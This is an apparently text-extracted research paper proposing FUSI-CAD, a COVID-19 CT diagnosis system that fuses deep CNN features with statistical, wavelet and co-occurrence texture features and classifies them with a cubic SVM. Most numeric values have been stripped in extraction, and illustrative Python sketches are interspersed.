preferred as another tool in the diagnosis and management of the novel coronavirus. ct offers a faster and simpler solution for medical diagnosis of covid- . 
it is used as well in observing of disease progression and the assessment of treatment efficiency (iwasawa et al., ; attallah et al., a). ct is considered as the main element of the diagnostic and treatment process for suspected cases due to its manifestations, which have been reported in several recent articles (lei et al., ; chung et al., ; song et al., a). moreover, it can be used alone by the radiologists due to the overlap of the appearance of covid- with other types of pneumonia, which challenges the examination process (shi, han & zheng, ). furthermore, manual examination using ct images needs lots of manual employment time-consuming. therefore, the health industry is considering other new technologies to screen and control the spread of the novel coronavirus pandemic. artificial intelligence (ai) is an example of such technologies that can tackle the propagation of such disease, recognize patients at risk, control this virus in real-time, and automatically detect and diagnose suspected cases (vaishya et al., ). machine learning (ml) and deep learning (dl) are classes of ai, which have the potential to enhance the diagnosis and treatment planning of covid- cases, being an evidence-based medical tool (attallah et al., b, a; karthikesalingam et al., ). computer-aided diagnosis (cad) systems based on ai techniques such as ml and specifically dl have been described as an effective tool to diagnose and detect numerous ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diseases and abnormalities from medical images (ragab, sharkas & attallah, ; attallah, sharkas & gadelkarim, ; ragab et al., ; attallah, sharkas & gadelkarim, ; attallah, gadelkarim & sharkas, ). the cad systems were used to diagnose several lung diseases such as tuberculosis (ke et al., ). the authors in wei et al. ( b) and capizzi et al. ( ) used ct images to classify lung nodule images. recently, the cad systems have been used for diagnosing and identifying covid- disease from other types of pneumonia. the authors in wieczorek, silka & woźniak ( ) employed a multicenter study that combines ct images for covid- patients from several countries to deliver probably a wide range of values about predicted covid- spread. the authors constructed a convolutional neural network (cnn) architecture, which is consists of seven layers. the network is trained by nadam, which is selected in tests for the greatest effectiveness and shortest training time achieving an accuracy %. zheng et al. ( ) used unet++ to segment lesions in ct images. afterward, the bounding box of the segmented lesion was generated. finally, a d-cnn was constructed for predicting the probability of covid- . the proposed method reached a sensitivity of . %, a specificity of . %, and an area under the receiver-operating curve (auc) of . ( . %). there were two limitations in this technique; first, the number of cases was small. moreover, the unet++ used in the segmentation of images may result in segmenting the infection areas that have small blood vessels that reduce the performance of the cad system. the authors in fang et al. ( ) applied radiomics analysis from a manually delineated region of interest (roi) ct images to diagnose covid- . afterward, unsupervised consensus clustering was used to choose significant features. finally, a support vector machine (svm) classifier was used to classify covid- . this study achieved an auc of . ( . %). 
the benefit of this study is using radiomics quantitative analysis as a feature extractor, which is considered as a powerful extractor along several medical domains (lambin et al., ; kolossváry et al., ). however, the main drawback of fang et al. ( ) method is that the authors used only handcrafted features and discarded the advantages of dl techniques, and therefore, they did not attain high performance. li et al. ( ) proposed a technique that depends on resnet- cnn to classify covid- . the sensitivity, specificity, and auc produced were %, %, and . ( %), respectively. the privilege of such a technique is that it used large amount of images. moreover, it utilized a heatmap to picture the important areas in the images in the classification. nevertheless, the heatmaps are not yet sufficient to capture what distinctive features are utilized by the model to differentiate between covid- and non-covid- . furthermore, ardakani et al. ( ) compare the performance of popular cnn to differentiate covid- from non-covid- patients. the results showed that resnet- and xception cnns have the highest performance. the accuracy, auc, sensitivity, and specificity obtained by resnet- cnn were . %, . ( . %), %, and . %, respectively. however, the xception cnn attained an accuracy of . %, an auc of . ( . %), a sensitivity of . %, and a specificity of %. the main advantages of ardakani et al. ( ) method are using very high-resolution images and splitting each image in the dataset into several patches that are then used to ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ train the cnn. the authors in singh, kumar & kaur ( ) introduced a novel cnn and tuned its initial parameters by using a multi-objective differential evolution (de) method, which was the key privilege of their cad system. the de algorithm has confirmed its effectiveness in various domains (zhang & sanderson, ). this evolution technique guarantees that the individual that has superior merits is left as a portion of the population and fragile individuals are detached with each iteration (hancer, xue & zhang, ). the results obtained were almost %. however, the limitation of singh, kumar & kaur ( ) and ardakani et al. ( ) study is they did not compare the performance of their cad system with that of the radiologist. he et al. ( ) employed several cnns to classify covid- cases. the best performance was achieved by densenet- where, the accuracy and auc were % and . ( %), respectively. the densenet is a novel cnn architecture, which can perform well in case of trained with a huge number of images; however, it has a high complexity and a large number of layers, which increase the chances of overfitting in case of trained with inadequate number of images. hasan et al. ( ) proposed a hybrid approach based on cnn, q-deformed entropy, and long-short-term-memory (lstm) network and accomplished an accuracy of . %. the advantage of this method is that the authors constructed a new cnn with few number of convolutional layers to decrease the over-fitting by reducing the cnn construction complexity. they also utilized a new feature extractor called q-deformed entropy, which is a textural analysis method capable of providing a major benefit in medical image classification. in addition, the q-deformed entropy is an entropy based technique that can detect small alterations in the image’s intensity values, along with sharpening the texture details (al-shamasneh et al., ). 
the authors in bai et al. ( ) employed efficientnet-b to identify covid- with an accuracy of %, auc of . ( %), sensitivity of %, and a specificity of %. the study of bai et al. ( ) has compared the performance of the cad system based on ai techniques with manual diagnosis by radiologists. it proved that the ai assistance had enhanced the radiologists’ performance in diagnosing covid- cases, but there could be a bias as a result of the radiologist’s evaluation of the same suspects twice, primary without, and then with ai assistance, whereas the authors in amyar, modzelewski & ruan ( ) used two u-nets to diagnose covid- . the first network was used to segment the lung from the rest of the image, while the other one for classification. the accuracy, auc, sensitivity, and specificity achieved were %, . ( %), %, and %, respectively. the benefit of this method is using a multi-task learning method, which fuses several portions of information from different tasks to enhance the performance of the cad system and its capability to better generalize. u-net was used as well in chen et al. ( ) to discriminate covid- and non-covid- . the results obtained showed an accuracy of . %, a sensitivity of %, and a specificity of . %. the reason of such good results is the huge number of images used to train their u-nets. a summary of similar studies is shown in table . as it is obvious from the table that most of the related work is based on dl techniques, which either employing a single cnn or combining two cnns where the first cnn is used for segmentation and the other ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a summary of recent similar related studies. paper dataset method results butt et al. ( ) covid- others resnet- and resnet- accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % li et al. ( ) covid- , others resnet- accuracy = . % auc = . ( %) sensitivity = % specificity = % bai et al. ( ) covid- others efficientnet-b accuracy = % auc = . ( %) sensitivity = % specificity = % he et al. ( ) covid- others densenet- accuracy = % auc = . ( %) amyar, modzelewski & ruan ( ) covid- others two u-nets accuracy = % auc = . ( %) sensitivity = % specificity = % ardakani et al. ( ) covid- others resnet- accuracy = . % auc = . ( . %) sensitivity = % specificity = . % xception accuracy = . % auc = . ( . %) sensitivity = . % specificity = % chen et al. ( ) , covid- , others u-net++ accuracy = . % sensitivity = % specificity = . % zheng et al. ( ) covid- others u-net and cnn accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % jin et al. ( b) covid- others u-net and resnet- accuracy = . % sensitivity = . % specificity = . % hasan et al. ( ) covid- others cnn,q-deformed entropy, and lstm accuracy = . % jin et al. ( a) covid- , others deeplab-v and resnet accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % song et al. ( b) covid- others resnet- accuracy = % auc = . ( %) sensitivity = % precision = % singh, kumar & kaur ( ) – cnn accuracy~ % wang et al. ( ) covid- others inception and adaboosted decision tree accuracy = . % auc = . ( %) sensitivity = % specificity = % fang et al. ( ) covid- , others radiomic feature extraction, clustering and svm auc = . ( . %) ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is for the classification and diagnosis of covid- . 
however, the process of fusing multiple cnns is not well examined in previous studies. moreover, almost all of the existing studies depend on dl only as a feature extraction, which may have some limitations regarding feature extraction complexity. feature extraction is a vital process for extracting important spatial variations of the image pixels. although, dl is considered a powerful tool for large- scale image classification and feature extraction, however, it could not be the ideal choice when the dataset available is not large containing a small number of images (nguyen et al., ). dl techniques may hardly employ heuristics to direct feature extraction for every particular task because of the automatic feature extraction procedure. they can also face the problem of overfitting when the training dataset is not large (zhang et al., ; nanni, ghidoni & brahnam, ). fusing dl and handcrafted features may improve the performance of the image classification problems (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). therefore, in this study, we proposed an efficient novel cad system called fusi-cad, which investigates the effect of fusing handcrafted features and dl features extracted from multiple cnns trained with covid- ct images. the proposed system as it will be discussed later consists of three stages: � stage ( )—deep features fusion: this is performed by extracting and fusing the deep features of the fine-tuned alexnet, googlenet, shufflenet, and resnet- cnn architectures. � stage ( )—handcrafted features fusion: this is accomplished by extracting and fusing three types of handcrafted (hc) features; the statistical features, discrete wavelet transform (dwt), and grey level co-occurrence matrix (glcm) features. � stage ( )—fusi-cad (dl and hc feature fusion): this is implemented by fusing the features of both stages ( ) and ( ). the fusi-cad system compares its performance with stages ( ) and ( ) to test the effect of fusing multiple dl features with three hc features on the performance of the cad system. the novelty of the fusi-cad system is concentrated in several contributions: � exploring various cnn based approaches different than that have been utilized in the literature for detecting the presence of covid- from chest ct images. � fusing features extracted from the deep layers of cnns to diagnose covid- patients, as the fusion of deep features was not examined in the literature. � combining powerful handcrafted features to diagnose covid- patients, as this was not examined in the literature. � comparing the usage of deep features with handcrafted features for diagnosing covid- with a dataset of few numbers of images. � a feature fusion based approach is proposed, which combines deep features from multiple individual cnns models with three powerful handcrafted features based on textural analyses, to produce a final accurate and efficient diagnostic tool even with a covid- dataset containing small number of images. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � developing a final fused model (multiple deep features and three handcrafted features), which is able to verify that each of the two feature extraction paradigms is capable of extracting information that is neglected by the other paradigm. � constructing a reliable model that is faster and more accurate than the conventionally used rt-pcr testing kit. 
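to make the fusion stages above concrete, the following is a minimal, illustrative sketch of stage (1), the deep-feature fusion: each pre-trained network has its classification head stripped so that a forward pass yields a deep feature vector, and the per-network vectors are concatenated. this is not the authors' implementation; the torchvision model variants (e.g., resnet18 standing in for the paper's resnet), the choice of the layer just before the classifier, the 224 × 224 input size, and the use of pytorch itself are assumptions made only for illustration (a recent torchvision release is assumed for the weights argument).

```python
# illustrative sketch of stage (1): fused deep features from several
# pre-trained cnns. model variants, layers, and input size are assumptions.
import numpy as np
import torch
import torch.nn as nn
import torchvision.models as models

def as_feature_extractor(net):
    """strip the classification head so the network returns penultimate-layer
    activations instead of class scores (an assumption; the paper names a
    specific layer per network)."""
    if hasattr(net, "fc"):                 # googlenet, shufflenet, resnet
        net.fc = nn.Identity()
    else:                                  # alexnet keeps its classifier head
        net.classifier[-1] = nn.Identity()
    return net.eval()

extractors = [as_feature_extractor(m) for m in (
    models.alexnet(weights="IMAGENET1K_V1"),
    models.googlenet(weights="IMAGENET1K_V1"),
    models.shufflenet_v2_x1_0(weights="IMAGENET1K_V1"),
    models.resnet18(weights="IMAGENET1K_V1"),   # resnet18 used here for illustration
)]

@torch.no_grad()
def fused_deep_features(x):
    """x: a pre-processed ct image as a (3, 224, 224) float tensor.
    returns the concatenated deep feature vector of stage (1)."""
    batch = x.unsqueeze(0)
    return np.concatenate([net(batch).squeeze(0).numpy() for net in extractors])
```

the handcrafted side of the fusion (stage (2)) and the final classification are sketched later, alongside the corresponding methods subsections.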
methods and materials dataset description the dataset used is sars-cov- ct-scan dataset. it is acquired from a hospital in sao paulo, brazil, and permitted by their ethical committee. the description of this dataset is available in soares et al. ( ). the dataset contains ct-images of covid- positive cases for patients ( male + female) and ct-scans for non-covid- cases for normal patients ( male + female), which are covid- negative but may have other pulmonary illnesses. figure shows some samples extracted from the dataset representing ct images for covid- and non-covid- . convolutional neural networks convolutional neural network (cnn) is a branch of dl methods that are broadly used for resolving classification problems of medical images in health informatics field (jin et al., b; ravì et al., ). for this reason, four cnn architectures are employed in this article. any cnn involves several layers including; convolutional layers, pooling layers, and fully connected (fc) layers. in the first layer, several filters are convolved with the region of the input image corresponding to the same dimension of the filter. next, a feature map is created representing the position of the features in the original image. such features characterize the spatial information of the pixel values of the original input image. then, the pooling layer lowers the huge dimension of the feature map using a down sampling process. lastly, the fc layer accomplishes the classification procedure similar to the conventional artificial neural network (ann). cnn can be either used as a classifier or feature extractor. in this paper, four cnns are employed as feature extractors. such networks include alexnet (krizhevsky, sutskever & hinton, ) and (dirvanauskas et al., ), googlenet (szegedy et al., ), shufflenet (girshick et al., ) and resnet- (he et al., ) constructions. the architectures of alexnet, googlenet, shufflenet, and resnet- cnn are illustrated in figs. – , respectively. the cnn networks are trained using the imagenet dataset, which has . million natural images in , -labelled classes. the transfer learning technique is performed on these networks so that it can be used in any classification problem. this is implemented by replacing the last fully connected layer in any network by a new layer for the classification of two classes: covid- and non-covid- . to our knowledge and according to the literature these networks have not yet been employed as feature extractors to classify covid- . a summary of the architecture of the four networks is shown in table . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed computer-aided diagnosis system the proposed cad system consists of four steps, which are image enhancement, feature extraction, feature fusion, and feature classifications steps. in the image enhancement step, images were enhanced using an adaptive contrast enhancement method. figure alexnet cnn architecture. full-size doi: . /peerj-cs. /fig- figure googlenet cnn architecture. full-size doi: . /peerj-cs. /fig- figure samples of ct images (a)–(c) covid- ct images and (d)–(f) non-covid- ct images. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
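the transfer-learning step described above, replacing the last fully connected layer of a pre-trained network with a new two-class layer for covid-19 versus non-covid-19, could look roughly as follows. the optimizer settings, epoch count, learning rate, and weight decay shown are placeholders rather than the paper's values, and pytorch/torchvision are assumed purely for illustration.

```python
# illustrative transfer-learning sketch: replace the final fc layer with a
# two-class layer and fine-tune with sgd + momentum (sgdm). hyperparameters
# are placeholders, not the paper's settings.
import torch
import torch.nn as nn
import torchvision.models as models

def make_two_class_net(name="resnet18"):
    net = getattr(models, name)(weights="IMAGENET1K_V1")
    if hasattr(net, "fc"):                       # resnet / googlenet / shufflenet
        net.fc = nn.Linear(net.fc.in_features, 2)
    else:                                        # alexnet
        net.classifier[-1] = nn.Linear(net.classifier[-1].in_features, 2)
    return net

def fine_tune(net, train_loader, epochs=20, lr=1e-4, momentum=0.9, device="cpu"):
    """one possible fine-tuning loop; googlenet's auxiliary outputs during
    training would need extra handling and are not covered by this sketch."""
    net = net.to(device).train()
    opt = torch.optim.SGD(net.parameters(), lr=lr, momentum=momentum,
                          weight_decay=1e-4)     # l2 regularisation (assumed value)
    loss_fn = nn.CrossEntropyLoss()
    for _ in range(epochs):
        for images, labels in train_loader:      # labels: 0 = non-covid-19, 1 = covid-19
            opt.zero_grad()
            loss = loss_fn(net(images.to(device)), labels.to(device))
            loss.backward()
            opt.step()
    return net.eval()
```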
https://peerj.com/computer-science/ afterward, in the feature extraction step, two types of features were extracted. first, four pre-trained cnns were constructed and used as feature extractors. these cnns include alexnet, googlenet, shufflenet, and resnet- architectures. second, three handcrafted (hc) feature extraction methods were employed to extract the features from the ct images. these handcrafted methods consist of statistical features and the textural analysis features; such as discrete wavelet transform (dwt) and grey level co-occurrence matrix (glcm). next, the feature fusion step, where features were fused in three stages; figure resnet- cnn architecture. full-size doi: . /peerj-cs. /fig- figure shufflenet cnn architecture. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � stage ( ) is the deep features fusion: in this stage, the deep features extracted from the four fine-tuned pre-trained cnn were fused. the influence of dl feature fusion was not examined in the diagnosis of covid- , therefore, the novel part is investigating the impact of dl fusion on identifying covid- patients. � stage ( ) is the handcrafted features fusion: this stage carried out a fusion from three hc feature extractors as mentioned previously. these features were not studied in the related work for coronavirus diagnosis and classification. therefore, the novel part is using the hc features in coronavirus diagnosis and investigating the effect of combining these three features on the classification results. � stage ( ) is the fusi-cad system: this stage was implemented by fusing the features of both the multiple dl features of stage ( ) and the fused handcrafted features of stage ( ). the fusi-cad system was conducted to verify that fusing the features of stages ( ) and ( ) can improve the diagnosis performance of covid- . to the best of our knowledge, the fusion of dl and hc features was not examined in related cad system discussing coronavirus diagnosis. finally, in the classification step, the fused features were used to construct classification models using a support vector machine (svm) with cubic kernel function to classify ct images into covid- or non-covid- . the framework of the proposed cad system is shown in fig. . the steps of the proposed cad system is discussed in detail in the following sub-sections. image enhancement step image enhancement is an important process to improve the image quality, contrast, and remove noise to help radiologists in identifying the abnormalities. there are several image enhancement methods; between them is the adaptive contrast enhancement method (ahe). ahe method has the ability to improve the local contrast and express more details in the image. in this study, the contrast-limited adaptive histogram equalization technique (clahe); a subclass of ahe is used to enhance the contrast of images (m.pizer et al., ; pisano et al., ). the clahe algorithm can be summarized as follows; (sahakyan, ) . split the original ct image into contextual areas, . find a local histogram for each pixel, table a summary of the architecture of the four pre-trained cnns used. cnn architecture number of layers input size output size alexnet × , × googlenet × , × shufflenet × × resnet- × × ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
bound this histogram based on the clip level, reorganize the histogram using binary examination, and get the enhanced pixel value by histogram integration.

feature extraction step
in this step, handcrafted features along with dl features are extracted. the details of the feature extraction step are illustrated in this subsection.

handcrafted feature extraction
texture analysis feature extraction methods are well-known techniques for mining features from medical images (castellano et al., ; kassner & thornhill, ; lahmiri & boukadoum, ; depeursinge, al-kadi & ross mitchell, ). such methods depend on the textural characteristics of the image. textural feature extraction methods include the discrete wavelet transform (dwt) and the grey-level co-occurrence matrix (glcm). these techniques usually yield reasonable classification accuracy, especially when they are combined (nailon, ; lahmiri & boukadoum, ). for this reason, they are used in this study to extract several subsets of features, along with statistical features from the spatial domain.

statistical features
in this step, each image was divided into non-overlapping blocks, each of size f × g pixels. afterward, eight statistical features were calculated from each block of an image in the spatial domain. next, the features from all blocks were combined into one feature vector. these features include entropy, mean, standard deviation, variance, root mean square (rms), minimum, maximum, and range, defined in the equations below; the size of the statistical feature vector extracted was .

\[ \mathrm{entropy} = -\sum_{i=0}^{N-1} pr_i \log_2 (pr_i) \]

where N is the number of grey levels and pr_i is the probability of a pixel having grey level i.

\[ \mathrm{mean}\,(m_z) = \frac{1}{fg} \sum_{i,j=1}^{f,g} p_z(i,j) \]

where p_z(i,j) is the pixel value in the image block z, and f × g is the size of each block z.

\[ \mathrm{standard\ deviation}\,(s_z) = \sqrt{\frac{1}{fg} \sum_{i,j=1}^{f,g} \left( p_z(i,j) - m_z \right)^2 } \]

\[ \mathrm{variance}\,(s_z^2) = \frac{1}{fg} \sum_{i,j=1}^{f,g} \left( p_z(i,j) - m_z \right)^2 \]

\[ \mathrm{rms} = \sqrt{\frac{1}{fg} \sum_{i,j=1}^{f,g} \left| p_z(i,j) \right|^2 } \]

\[ \mathrm{range}\,(r_z) = p_{z\,\mathrm{max}} - p_{z\,\mathrm{min}} \]

where p_{z max} and p_{z min} are the maximal and minimal pixel values in an image block z.

discrete wavelet transform
the discrete wavelet transform (dwt) is a common approach to extract features in the medical image processing field (lahmiri & boukadoum, ; srivastava & purwar, ). dwt provides a time-frequency representation by decomposing an image using a set of orthogonal (ortho-normal) basis functions. dwt has a set of transforms, each with a number of wavelet basis functions. in the case of 2-d images, a one-level 2-d dwt is employed, where a 1-d dwt is applied along each dimension separately to attain four sets of coefficients. the four coefficients generated from the 2-d dwt are the approximation coefficients ca and three detail coefficients cd, comprising the horizontal, vertical, and diagonal coefficients, respectively. multilevel 2-d dwt may be used as well to accomplish multiple decomposition levels. the multilevel decomposition is achieved by convolving the approximation components created in the preceding decomposition level with several high- and low-pass filters (mallat, ; anitha & murugavalli, ).
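before moving on to the wavelet and co-occurrence descriptors, the enhancement and block-statistics steps just described can be sketched as follows, assuming python with scikit-image and numpy. the clahe clip limit and the block size are assumptions, since the paper's exact values are not reproduced here, and the input image is assumed to be scaled to [0, 1].

```python
# a minimal sketch of clahe enhancement followed by the eight per-block
# statistics (entropy, mean, standard deviation, variance, rms, minimum,
# maximum, range) described in the text. block size and clip limit are
# assumptions.
import numpy as np
from skimage import exposure

def clahe_enhance(image, clip_limit=0.02):
    """contrast-limited adaptive histogram equalisation; returns a float image
    scaled to [0, 1]."""
    return exposure.equalize_adapthist(image, clip_limit=clip_limit)

def block_statistics(image, block=32, levels=256):
    """divide the image into non-overlapping block x block tiles and compute
    the eight statistics for each tile, concatenated into one feature vector.
    the image is assumed to lie in [0, 1] (e.g., the output of clahe_enhance)."""
    feats = []
    h, w = image.shape
    for r in range(0, h - block + 1, block):
        for c in range(0, w - block + 1, block):
            z = image[r:r + block, c:c + block].astype(np.float64)
            hist, _ = np.histogram(z, bins=levels, range=(0.0, 1.0))
            p = hist / hist.sum()
            p = p[p > 0]
            feats.extend([
                -np.sum(p * np.log2(p)),                   # entropy
                z.mean(), z.std(), z.var(),                # mean, std, variance
                np.sqrt(np.mean(z ** 2)),                  # rms
                z.min(), z.max(), z.max() - z.min(),       # minimum, maximum, range
            ])
    return np.asarray(feats)

# typical use: stats = block_statistics(clahe_enhance(ct_slice))
```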
an example of a first-level decomposition for a non-covid-19 sample is illustrated in fig. c.

figure: the framework of the proposed cad system.

in the proposed fusi-cad system, four decomposition levels of dwt are applied to the images. the fourth decomposition level of 2d-dwt usually enhances the performance when used with medical images, as stated in chato, chow & latifi ( ), and this is proved in the results section. in this paper, the haar wavelet was employed as the wavelet basis function. after performing the four-level decomposition, the approximation, horizontal, vertical, and diagonal coefficients of the fourth decomposition stage were extracted to form a feature subset. the number of features extracted from the fourth level of dwt was .

grey-level co-occurrence matrix
the grey-level co-occurrence matrix (glcm) approach is a common method for pulling out texture features from images (haralick, shanmugam & dinstein, ). the glcm method is used to extract surface features such as contrast, homogeneity, correlation, and energy in the images. the glcm features are determined using the equations below. the length of the features extracted using glcm was . an example of the glcm features of a non-covid-19 sample is shown in fig. d.

figure: the illustration of the handcrafted features. (a) original non-covid-19 sample, (b) enhanced image using the clahe method, (c) the first-level dwt decomposition, and (d) glcm features.

\[ \mathrm{contrast} = \sum_{n=0}^{G-1} n^2 \left\{ \sum_{i} \sum_{j} p(i,j) \; : \; |i-j| = n \right\} \]

\[ \mathrm{correlation} = \sum_{i} \sum_{j} \frac{(i \cdot j)\, p(i,j) - \mu_x \mu_y}{\sigma_x \sigma_y} \]

\[ \mathrm{energy} = \sum_{i} \sum_{j} \left( p(i,j) \right)^2 \]

\[ \mathrm{homogeneity} = \sum_{i} \sum_{j} \frac{p(i,j)}{1 + |i-j|} \]

where p(i, j) is the marginal joint probability entry of the normalised grey-level co-occurrence matrix for grey levels i and j.

deep learning feature extraction step
pre-trained convolutional neural networks can be further trained on the ct images to carry out either classification or feature extraction tasks. in the feature extraction task, useful deep features are taken out from one of the layers of the cnn. in this study, instead of using the cnns as classifiers, dl features were extracted from the "fc" layer, the dropout layer named "pool drop × s", the "global average pooling d layer" (fifth pooling layer), and the "node" layer of the fine-tuned alexnet, googlenet, resnet- , and shufflenet architectures, respectively. the length of the dl features extracted from each cnn was , , , and for alexnet, googlenet, resnet- , and shufflenet, respectively.

feature fusion step
the feature fusion step consists of three stages. in the first stage, all dl features extracted from the four cnns were combined in a concatenated manner. the number of dl features after fusion was , . in the second stage, all handcrafted features extracted using the dwt, glcm, and statistical methods were fused. the length of the feature space for the handcrafted features was . as mentioned earlier, related image classification studies have reported that combining dl and handcrafted features may enhance classification performance (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). thus, in the third stage, the fusi-cad system was constructed by fusing both the dl and hc features.
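a sketch of the handcrafted side of this fusion (stage (2)) is shown below, assuming python with pywavelets and scikit-image. the haar wavelet and the four decomposition levels follow the text, while the glcm distance and angle are assumptions, and block_statistics refers to the helper defined in the previous sketch; none of this reproduces the authors' exact feature lengths.

```python
# illustrative sketch of the dwt and glcm descriptors and the fused
# handcrafted (hc) feature vector of stage (2). glcm distance/angle and the
# uint8 quantisation are assumptions; block_statistics comes from the
# previous sketch.
import numpy as np
import pywt
from skimage.feature import graycomatrix, graycoprops

def dwt_level4_features(image):
    """four-level 2-d haar decomposition; the approximation and detail
    coefficients of the fourth (coarsest) level form the feature subset."""
    coeffs = pywt.wavedec2(image, "haar", level=4)
    ca4, (ch4, cv4, cd4) = coeffs[0], coeffs[1]
    return np.concatenate([c.ravel() for c in (ca4, ch4, cv4, cd4)])

def glcm_features(image, levels=256):
    """contrast, correlation, energy, and homogeneity from a normalised glcm
    (distance 1, angle 0 assumed); the input image is assumed to lie in [0, 1]."""
    img_u8 = np.clip(image * (levels - 1), 0, levels - 1).astype(np.uint8)
    glcm = graycomatrix(img_u8, distances=[1], angles=[0],
                        levels=levels, symmetric=True, normed=True)
    return np.array([graycoprops(glcm, prop)[0, 0]
                     for prop in ("contrast", "correlation", "energy", "homogeneity")])

def handcrafted_features(image):
    # stage (2): fuse the statistical, dwt, and glcm subsets into one hc vector
    return np.concatenate([block_statistics(image),
                           dwt_level4_features(image),
                           glcm_features(image)])
```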
the aim of this third stage was to examine the effect of this fusion on the performance of the fusi-cad system in distinguishing between covid-19 and non-covid-19 cases. the performance of the fusi-cad system was compared with the first two stages to test the effect of fusing multiple dl features with the three hc features on the performance of the cad system.

classification step
this step is responsible for classifying ct images into covid-19 and non-covid-19 using the svm classifier. svm is a machine learning method that uses statistical learning theory to perform classification. the svm classifier is used to construct the optimal hyperplane with the highest margin separating the two groups of ct data. support vectors represent the data points that lie on the margin. svm employs a kernel function to convert the feature space into a new domain to make the separation between the two classes of the dataset easier (wagh & vasanth, ). in this paper, the cubic kernel function is chosen as it achieved the highest results.

performance evaluation
the performance of the proposed fusi-cad system is calculated with several metrics such as accuracy, sensitivity, precision, specificity, f-score, diagnostic odds ratio (dor), and area under the receiver operating characteristic curve (auc). the equations used to calculate these metrics are shown below.

\[ \mathrm{accuracy} = \frac{TP + TN}{TP + TN + FP + FN} \]

\[ \mathrm{sensitivity} = \frac{TP}{TP + FN} \]

\[ \mathrm{specificity} = \frac{TN}{TN + FP} \]

\[ \mathrm{precision} = \frac{TP}{TP + FP} \]

\[ \mathrm{f\text{-}score} = \frac{2\,TP}{2\,TP + FP + FN} \]

\[ \mathrm{dor} = \frac{TP \cdot TN}{FP \cdot FN} \]

where tp is the number of covid-19 images that are properly classified and tn is the number of non-covid-19 images that are properly classified. fp is the number of non-covid-19 images that are incorrectly classified as covid-19, and fn is the number of covid-19 images that are incorrectly classified as non-covid-19.

experimental set up
parameter setting
some parameters are adjusted for the pre-trained cnns. the mini-batch length and validation frequency are and , respectively; the total number of epochs is equal to , and the initial learning rate for the four cnns is − . the l -regularization is . . all other parameters are not altered. these arrangements ensure that the parameters are tuned for classifying medical ct images of covid-19. stochastic gradient descent with momentum (sgdm) is applied for the optimization. to verify the performance of the proposed fusi-cad system, -fold cross-validation is employed.

augmentation
augmentation is an essential process that is usually performed to enlarge a dataset that has a small number of images. this procedure is needed because a classification model trained with an insufficient amount of data is likely to over-fit (ravì et al., ). overfitting means that the model will memorize the details of the training set and will not perform well on testing sets. the augmentation methods used to generate new lung ct images from the training data in this paper are translation, flipping, scaling, and rotation. every original ct image was flipped, then translated and scaled in the x and y directions with a pixel range of (− to ) and a scale range of ( . – . ), respectively. furthermore, the images were rotated with an angle range of ( – ) degrees.
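the classification and evaluation steps described above can be sketched as follows, assuming scikit-learn: a polynomial kernel of degree 3 plays the role of the cubic kernel, and the metrics are computed from the confusion matrix exactly as in the equations above. the number of cross-validation folds shown is an assumption, and the feature matrix is whichever fused representation (dl, hc, or dl + hc) is being evaluated.

```python
# illustrative sketch of the cubic-kernel svm with k-fold cross-validation and
# the confusion-matrix metrics (accuracy, sensitivity, specificity, precision,
# f-score, dor). the fold count is an assumption.
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import confusion_matrix

def evaluate_fused_features(X, y, n_splits=10, seed=0):
    """X: rows are fused feature vectors; y: 1 = covid-19, 0 = non-covid-19.
    returns the mean of each metric over the cross-validation folds."""
    scores = []
    skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)
    for train_idx, test_idx in skf.split(X, y):
        clf = SVC(kernel="poly", degree=3)          # "cubic" kernel
        clf.fit(X[train_idx], y[train_idx])
        y_pred = clf.predict(X[test_idx])
        tn, fp, fn, tp = confusion_matrix(y[test_idx], y_pred, labels=[0, 1]).ravel()
        scores.append({
            "accuracy":    (tp + tn) / (tp + tn + fp + fn),
            "sensitivity": tp / (tp + fn),
            "specificity": tn / (tn + fp),
            "precision":   tp / (tp + fp),
            "f1":          2 * tp / (2 * tp + fp + fn),
            "dor":         (tp * tn) / max(fp * fn, 1),   # guard against division by zero
        })
    return {k: float(np.mean([s[k] for s in scores])) for k in scores[0]}
```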
results this study proposed a novel cad system called fusi-cad based on the fusion of multiple cnns and three handcrafted features to classify covid- and non-covid- cases. in this section, the classification results of the three stages of the features fusion are presented. deep features fusion stage in this stage, the deep features from alexnet, googlenet, shufflenet, and resnet- , cnns were extracted, combined, and used to construct a cubic svm classifier. the performance of the cubic kernel svm classifier trained with the fused deep features was compared to the one constructed with dl features extracted from the four cnns individually as shown in table . for the single deep feature classification, the classification scores for resnet- cnn features achieved the highest scores compared to the other cnn features. this was clear from table , as the accuracy and auc achieved were . % and . ( %), respectively. however, the sensitivity, specificity, precision, and f score attained to . ( . %) each. moreover, the classification scores for the individual features of the googlenet and shufflenet cnns were almost the same. this was because the accuracy achieved was . % and . % for googlenet and shufflenet cnns, respectively. in addition, the auc and the sensitivity were the same for both features achieving . ( %) and . ( %), respectively. however, there was a slight change in the scores of the specificity, precision, and f score for the two cnns features. the 